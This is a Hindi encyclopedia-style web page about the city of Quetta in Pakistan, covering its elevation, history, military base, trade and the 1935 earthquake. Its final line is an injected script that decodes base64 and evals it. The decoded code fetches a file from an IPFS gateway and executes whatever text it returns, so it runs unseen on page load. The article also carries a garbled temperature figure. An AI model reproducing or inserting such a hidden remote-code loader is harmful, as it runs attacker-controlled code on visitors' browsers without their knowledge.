एक्स्प्रेशन त्रुटि: अनपेक्षित उद्गार चिन्ह "२"।

क्वेटा

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.

क्वेटा भारत के पड़ोसी देश पाकिस्तान का एक नगर, जो बलूचिस्तान पांत की राजधानी है। यह रेल मार्ग द्वारा ईरान तथा अफ़ग़ानिस्तान की सीमा से जुड़ा हुआ है। क्वेटा में पाकिस्तान का सबसे बड़ा सैनिक अड्डा तथा सैनिक प्रशिक्षण संस्थान है।

  • यह नगर लगभग 5500 फुट की ऊँचाई पर स्थित है। क्वेटा नाम के मूल में 'क्वात-कोट' है और स्थानीय लोग इसे 'शलकोट' कहते हैं।
  • ग्रीष्म ऋतु में यहाँ दिन गर्म जबकि रात्रि ठ्ण्डी होती हैं। जाड़े का ताप प्राय: 180 सेंटीग्रेड से नीचे रहता है।
  • प्रसिद्ध बोलन दर्रे पर स्थित होने से क्वेटा का विशेष सैनिक महत्व रहा है।
  • वर्ष 1876 ई. में जब सर राबर्ट संडेमन ने यहाँ रेजीडेंसी स्थापित की, तब क्वेटा को महत्व प्राप्त हुआ। इससे पूर्व यह एक छोटा-सा बाज़ार था और कुछ मिट्टी के घर तथा छिटपुट बगीचे ही यहाँ विद्यमान थे।
  • क्वेटा में 1907 में एक सैनिक स्कूल खोला गया था।
  • यह पश्चिमी अफ़ग़ानिस्तान, पूर्वी ईरान और अधिकांश मध्य एशिया से व्यापार का केंद्र बना और बाद में इसे रेलमार्ग से भी जोड़ा गया।
  • वर्तमान में क्वेटा में पाकिस्तान का सबसे बड़ा सैनिक अड्डा तथा सैनिक शिक्षालय है और रेल के द्वारा यह अफ़ग़ानिस्तान तथा ईरान की सीमा से जुड़ा है।
  • पाकिस्तान के अन्य नगरों को यहाँ से सड़कें जाती हैं। यहाँ मुख्यत: ताजे और सुखे मेवे, फल, जड़ी बूटी और खाल का व्यवसाय होता है।
  • 1935 में यह नगर एक भीषण भूकंप में प्राय: एकदम नष्ट हो गया था। तब भूकंप से मरने वालों की संख्या 20 से 40 हज़ार के बीच अनुमानित की गई थी।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>